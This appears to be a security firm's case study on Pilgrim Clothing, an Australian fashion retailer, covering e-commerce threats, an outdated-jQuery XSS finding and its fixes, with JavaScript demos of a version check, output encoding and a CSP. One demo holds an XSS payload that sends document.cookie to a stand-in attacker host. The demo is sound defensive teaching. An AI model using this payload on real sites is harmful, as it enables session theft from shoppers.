Pilgrim Clothing, a leading women’s fashion brand in Australia, was founded in 1992. Rapidly expanding from a single store to 15 retail locations nationwide, Pilgrim quickly established itself as the go-to event wear label in the country.
However, the rise of online e-commerce presented significant challenges. To survive, Pilgrim had to adapt to the changing industry landscape. Embracing change, Pilgrim adopted a two-pronged strategy to ensure their continued success:
With the shift to e-commerce, Pilgrim encountered a new set of challenges—cybersecurity. E-commerce brands are prime targets for cybercriminals due to the personal and payment data they collect, particularly smaller brands that may lack the funding for a robust cybersecurity strategy.
Faced with the 30% increase in e-commerce cyberattacks in recent years, Pilgrim engaged xSpectre to enhance their cybersecurity measures, safeguarding their reputation and protecting their customers’ personal data.
Web skimming is a prevalent threat in which criminals inject malicious JavaScript into e-commerce checkout pages to copy card details as the customer types them. Magecart, the umbrella name for several groups running these campaigns, has been behind a number of high-profile incidents in recent years. The entry point varies from case to case; a common one is an unpatched or end-of-life platform such as Magento 1.x, which stopped receiving security fixes in June 2020 and should be migrated to a supported version.
Phishing remains a widespread threat where cybercriminals impersonate legitimate entities, such as banks or e-commerce sites, to trick users into revealing personal information or clicking on malicious links. While general phishing is common, sophisticated spear-phishing attacks targeting specific individuals within an organisation are less frequent but can be significantly damaging.
Malware, including viruses and spyware, poses a significant risk to e-commerce systems, potentially leading to data breaches or system disruptions. While general malware attacks are common, zero-day exploits—attacks targeting previously unknown vulnerabilities—are less common but can have severe effects.
DDoS attacks flood a website with excessive traffic, causing service outages. While such attacks are common, large-scale, sophisticated DDoS attacks designed to disrupt services during peak periods are less frequent but highly impactful.
XSS vulnerabilities allow attackers to inject scripts into web pages viewed by other users, where the script runs with the site's own privileges. Reflected and stored XSS through unencoded user input are the common cases; DOM-based XSS and payloads crafted to get past input filters or a loose Content Security Policy are rarer but harder to detect and block.
APIs are crucial for e-commerce functionality but can also be exploited by attackers to manipulate transactions or access sensitive data. While general API attacks are common, targeted and sophisticated API exploits are less frequent but can lead to significant security breaches.
The complex e-commerce supply chain, involving third-party vendors and logistics partners, can be a target for attacks. Although supply chain threats are common, highly targeted attacks aimed at specific suppliers are less frequent but can have extensive repercussions.
We initiated a thorough Vulnerability Management service, which involved scanning Pilgrim Clothing's website and internal network. This service was designed to identify, assess, prioritise, and guide the remediation of security vulnerabilities within their IT infrastructure. By systematically evaluating their systems, we aimed to reduce the risk of malicious cyberattacks and data breaches, ensuring a more secure environment for their online operations.
In addition to Vulnerability Management, we deployed a Web Application Scanner to crawl Pilgrim’s website. This tool was instrumental in identifying risks arising from updates, user activities, and system modifications. The scanner provided us with detailed insights into potential weaknesses in the website’s security framework.
Through these two services, we discovered six vulnerabilities that Pilgrim Clothing had not been aware of. One was classified as critical; the other five were rated medium.
For confidentiality reasons, this case study discusses only one of them: an outdated jQuery library on the website, reported by the scanner as the jQuery 1.0.3 < XSS Vulnerability.
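The check behind a finding like this is simple: the scanner reads the script tags on each crawled page, pulls the version out of the jQuery file name, and compares it against a floor. The block below is an added example of that check, not xSpectre's scanner or anything from the original case study. It assumes the version is recoverable from the file name (jquery-X.Y.Z[.min].js) and uses 3.5.0 as an assumed floor, that being the release in which jQuery fixed its htmlPrefilter XSS; the sample HTML is constructed, not Pilgrim's markup.

```javascript
// Added example (not xSpectre's tooling): flag outdated jQuery references in
// page HTML, the kind of check a web application scanner runs while crawling.
// Assumptions: version is in the script file name; 3.5.0 is the assumed floor.

const MIN_SAFE_JQUERY = '3.5.0';

// Constructed sample page, not Pilgrim's real markup.
const SAMPLE_HTML = `
<html><head>
<script src="/static/js/jquery-1.4.2.min.js"></script>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src="/static/js/app.js"></script>
</head><body></body></html>`;

function parseVersion(v) {
  return v.split('.').map(n => parseInt(n, 10));
}

// Numeric, component-wise comparison so 1.10.0 sorts above 1.9.1.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    const x = pa[i] || 0, y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Pull every script tag whose src looks like a jQuery build and record its version.
function findJqueryScripts(html) {
  const re = /<script[^>]+src=["']([^"']*jquery-(\d+\.\d+(?:\.\d+)?)[^"']*\.js)["']/gi;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    found.push({ src: m[1], version: m[2] });
  }
  return found;
}

// Mark each reference as outdated when it is below the assumed floor.
function auditJquery(html, minSafe = MIN_SAFE_JQUERY) {
  return findJqueryScripts(html).map(s => ({
    ...s,
    outdated: compareVersions(s.version, minSafe) < 0,
  }));
}

console.log(auditJquery(SAMPLE_HTML));
```

A site often loads more than one copy of jQuery (a theme bundle and a plugin each shipping their own), which is why the check returns every reference rather than the first; a version check on the file name is a first pass only, since a renamed or vendored copy needs `jQuery.fn.jquery` read at runtime instead.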
Imagine you’re managing a bustling online store where customers browse, click, and shop. Now, picture a hacker sneaking malicious code into your website. This is the essence of a Cross-Site Scripting (XSS) attack.
The attacker finds an injection point, such as a form field or URL parameter whose value is placed into the page without proper encoding, or an outdated client-side library that parses untrusted strings as HTML, and supplies a script payload.
When another user loads the affected page, their browser runs the payload in the context of the site, so it can read session cookies, capture keystrokes in the checkout form, or send card details to a server the attacker controls.
Validate user input, and encode all output for the context in which it lands (HTML body, attribute, JavaScript, URL); encoding at output time is what actually prevents injected markup from being interpreted.
Implement a Content Security Policy (CSP) that restricts script sources to your own origin and approved CDNs and disallows inline scripts, so an injected payload is blocked even if encoding is missed.
Use a WAF to filter requests carrying common XSS payloads, as a layer of defence in depth rather than a substitute for fixing the code.
Keep client-side libraries such as jQuery current, and train developers on secure coding practices to avoid common vulnerabilities.
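The following is an added example, not code from the page or from xSpectre, showing the attack and the first two mitigations side by side: a product-review string rendered into markup unencoded (the same class of flaw as handing untrusted text to innerHTML or to an old jQuery `$(html)` call), the same string rendered through an HTML encoder, and a CSP header built so that inline event handlers are refused. It runs under Node without a browser; the review text, the `evil.example` host and the CDN origin are constructed for illustration.

```javascript
// Added example (not the page's or xSpectre's code): vulnerable render, hardened
// render, and a CSP that blocks the inline handler even if encoding is missed.
// The review text, the evil.example host and the CDN origin are constructed.

const UNTRUSTED_REVIEW =
  'Love it! <img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">';

// Vulnerable: untrusted text is concatenated straight into markup.
function renderReviewUnsafe(review) {
  return `<div class="review">${review}</div>`;
}

// Hardened: encode the five characters that matter in an HTML text context
// before the string touches markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

function renderReviewSafe(review) {
  return `<div class="review">${escapeHtml(review)}</div>`;
}

// Crude stand-in for the browser's parser: is there any tag in the output
// other than our own wrapper div? A raw "<img" means the payload survived.
function containsInjectedTag(html) {
  return /<(?!\/?div\b)[a-z]/i.test(html);
}

// Second layer: a Content-Security-Policy that allows scripts only from the
// site itself, one allow-listed CDN, and a per-response nonce. Injected
// onerror= handlers carry no nonce, so the browser refuses to run them.
function buildCsp(nonce, cdnOrigin = 'https://code.jquery.com') {
  return [
    "default-src 'self'",
    `script-src 'self' ${cdnOrigin} 'nonce-${nonce}'`,
    "object-src 'none'",
    "base-uri 'self'",
  ].join('; ');
}

const unsafe = renderReviewUnsafe(UNTRUSTED_REVIEW);
const safe = renderReviewSafe(UNTRUSTED_REVIEW);
console.log('unsafe render carries payload:', containsInjectedTag(unsafe));
console.log('safe render carries payload:  ', containsInjectedTag(safe));
console.log('Content-Security-Policy:', buildCsp('r4nd0mN0nce'));
```

The encoder above is only correct for the HTML text and quoted-attribute contexts; a value dropped into a JavaScript string, a URL, or a CSS block needs the encoder for that context, which is why templating engines that encode by default are preferable to hand-rolled concatenation. The nonce in the CSP must be freshly random per response, since a fixed value is as good as `'unsafe-inline'`.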